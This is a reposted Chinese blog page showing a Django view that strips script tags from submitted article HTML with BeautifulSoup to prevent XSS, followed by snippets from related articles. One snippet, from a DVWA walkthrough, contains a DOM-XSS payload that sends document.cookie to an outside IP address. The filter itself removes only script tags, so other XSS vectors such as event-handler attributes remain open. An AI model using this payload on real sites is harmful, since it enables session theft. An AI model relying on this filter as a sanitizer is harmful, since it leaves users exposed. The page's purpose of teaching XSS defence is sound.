基于bs4的防止xss攻击,过滤script标签

最新推荐文章于 2023-02-02 14:03:57 发布
转载 最新推荐文章于 2023-02-02 14:03:57 发布 · 160 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/cjj-zyj/p/9968894.html
文章标签:

#python

本文介绍了一种在后台管理系统中添加文章时如何通过使用BeautifulSoup库来防止XSS攻击的方法,具体包括如何过滤掉潜在的恶意script标签,并生成文章摘要。 
from bs4 import BeautifulSoup


@login_required
def add_article(request):
    """
    后台管理的添加书籍视图函数
    :param request:
    :return:
    """
    if request.method == "POST":
        title = request.POST.get("title")
        content = request.POST.get("content")

        # 防止xss攻击,过滤script标签
        soup=BeautifulSoup(content,"html.parser")
        for tag in soup.find_all():

            print(tag.name)
            if tag.name=="script":
                tag.decompose()

        # 构建摘要数据,获取标签字符串的文本前150个符号

        desc=soup.text[0:150]+"..."

        models.Article.objects.create(title=title,desc=desc,content=str(soup), user=request.user)
        return redirect("/cn_backend/")

    return render(request, "backend/add_article.html")

 

转载于:https://www.cnblogs.com/cjj-zyj/p/9968894.html

富文本编辑框和防止xss攻击
hqs2212586的专栏
08-07 4806
富文本编辑框和防止xss攻击 一、后台管理页面构建  1、创建后台管理url urlpatterns = [ ... # 后台管理url re_path("cn_backend/$", views.cn_backend), re_path("cn_backend/add_article/$", vie...
DVWA系列之XSS(跨站脚本攻击)——DOM型XSS源码分析及漏洞利用
7Riven's blog
11-27 1600
DOM型XSS Document Object Model 文本对象模型xss、可能是存储型也可能是反射型、只决定于输出地方 在反射型XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
# 防止xss攻击,过滤script标签,获取出标签外的内容
weixin_30394633的博客
03-06 1022
from bs4 import BeautifulSoups = '<h1>123</h1> <span>456<span>'soup = BeautifulSoup(s,'html.parser')print(soup.text) # 结果 123 456 # 构建摘要数据,获取标签字符串的文本前150个符号 soup=Bea...
python爬取script标签,用BS4抓取<script>标记
weixin_29179311的博客
03-26 2205
我是Python新手,正在尝试开发一个简单的web scraper。我在HTML中抓取脚本标记时遇到问题。这是我的代码:from urllib.request import Request, urlopenfrom bs4 import BeautifulSoupimport relink = "https://yeezysupply.com/products/womens-mule-pvc-cl...
数据解析之bs4
qq_51050526的博客
06-09 178
BeautifulSoup 将互联网上获取的页面源码page_text加载到soup对象 page_text=response.text soup=BeautifulSoup(page_text,'lxml') 数据解析的方法: soup.tagName:返回文档中第一次出现的tagName对应的标签 soup.find( ‘tagName’):等同于soup. div 属性定位: -soup. find(‘div’ ,class_ / id/attr=’ song’ ) -soup. find_
bs4删除元素
洪源的博客
09-16 1029
删除自身 tag.decompose() 去除某类型 soup = BeautifulSoup(r.text, "lxml") #去除soup里面的script和style标签 [s.extract() for s in soup('script')]
前端安全之XSS攻击
weixin_34381666的博客
02-18 1284
XSS(cross-site scripting跨域脚本攻击攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是: 1. Reflected XSS(基于反射的XSS攻击) 2. Stored XSS(基于存储的XSS攻击) 3. DOM-based or local XSS(基于DOM或本地的XSS攻击) Reflected XSS 基于反射的...
Web安全实战:0l4bs XSS实验室挑战解析
- Chall 14 | Regex Filter #1 和 Chall 15 | Regex Filter #2:正则表达式过滤通常用于防止XSS攻击,但如果正则表达式编写不当,则可能被绕过。 以上知识点为XSS实验室中遇到的可能挑战和所涉及的技术细节。标签...
实现HTML标签过滤的函数方法解析
一个基本的HTML标签过滤函数的目的是去除用户输入中的所有HTML标签,以防止可能的XSS攻击。然而,要注意的是,仅去掉尖括号并不足以完全防止XSS攻击,因为某些标签可以通过属性、事件处理器等方法执行JavaScript代码...
【PyEcharts安全防护】:图表安全显示,防御XSS攻击的策略
首先介绍了PyEcharts的基础知识和安全背景,随后详细分析了不同类型的XSS攻击原理及其对PyEcharts的具体影响。接着,文章阐述了如何通过输入验证、内容生成和图表配置等方面的安全显示策略来防范XSS攻击。此外,本文...
利用BeautifulSoup去除HTML指定标签和去除注释
退役熬夜选手的博客
02-02 764
利用BeautifulSoup去除HTML指定标签和去除注释
svg 简单了解
web修理工
11-10 563
参考链接:http://cw.hubwiz.com/card/c/5636b7041bc20c980538e995/1/4/5/ 参考链接:https://www.jianshu.com/p/8ddb4ba85594 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=
爬虫笔记14bs4简介、bs4的快速入门、find()和find_all()方法
微信公众号进阶的阿牛哥的博客
05-15 7444
一、bs4简介 1、基本概念 Beautiful Soup 是一个可以从HTML或XML文件中提取数据的网页信息提取库。 2、有什么作用? 解析和提取网页中的数据 3、有什么意义? 随着网站的种类增多,去寻找最适合解决这个网站的技术。 正则表达式有的时候不太好写,容易出错; xpath 记住一些语法://*[@id=“content”]/div[2]/div/div/p[2]/span bs4的特点:只需要记住一些方法就可以了。 二、bs4源码分析(github下载源码) 源码当中有一些小图标: c :Cl
爬虫 beautifulsoup 去除script
qq_25739719的博客
03-27 2477
加入下面代码[s.extract() for s in soup('script')]
[python] BeautifulSoup处理script标签
Moke
10-31 6498
import BeautifulSoup soup = BeautifulSoup.BeautifulSoup(html) 利用这个包先把html里script,style给清理了: [script.extract() for script in soup.findAll(‘script’)] [style.extract() for style in soup.findAll(‘style’)]...
使用Beautifulsoup去除特定标签
felcon的专栏
08-25 1万+
试用了Beautifulsoup,的确是个神器。 在抓取到网页时,会出现很多不想要的内容,例如<script>标签,利用beautifulsoup可以很容易去掉。 -> soup = BeautifulSoup('<script>a</script>Hello World!<script>b</script>') -> [s.extract() for s in soup(‘script
爬虫bs4
weixin_30673611的博客
03-05 741
CSS 选择器:BeautifulSoup4 和 lxml 一样,Beautiful Soup 也是一个HTML/XML的解析器,主要的功能也是如何解析和提取 HTML/XML 数据。 lxml 只会局部遍历,而Beautiful Soup 是基于HTML DOM的,会载入整个文档,解析整个DOM树,因此时间和内存开销都会大很多,所以性能要低于lxml。 BeautifulSoup 用来...
BeaufulSoup获取特定标签下内容的方法
热门推荐
LivingStone的博客
05-19 6万+
以下是个人在学习beautifulSoup过程中的一些总结,目前我在使用爬虫数据时使用的方法的是:先用find_all()找出需要内容所在的标签,如果所需内容一个find_all()不能满足,那就用两个或者多个。接下来遍历find_all的结果,用get_txt()、get('href')、得到文本或者链接,然后放入各自的列表中。这样做有一个缺点就是txt的数据是一个单独的列表,链接的数据也是一个单
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值